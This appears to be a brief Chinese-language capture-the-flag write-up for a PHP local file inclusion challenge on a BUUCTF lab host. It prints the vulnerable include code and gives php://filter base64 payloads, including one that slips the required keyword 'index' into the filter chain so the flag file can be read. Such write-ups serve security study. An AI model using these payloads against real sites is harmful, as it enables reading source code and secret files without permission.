先看url,发现可能有注入
http://655c742e-b427-485c-9e15-20a1e7ef1717.node5.buuoj.cn:81/index.php?category=woofers
试试能不能查看index.php直接?category=index.php不行,试试伪协议
把.php去掉试试
base64解码
<?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){ include ($file . '.php'); } else{ echo "Sorry, we currently only support woofers and meowers."; } } ?>
说明参数要包含woofers、meowers、index
试试读取flag文件
?category=php://filter/convert.base64-encode/index/resource=flag
base64解码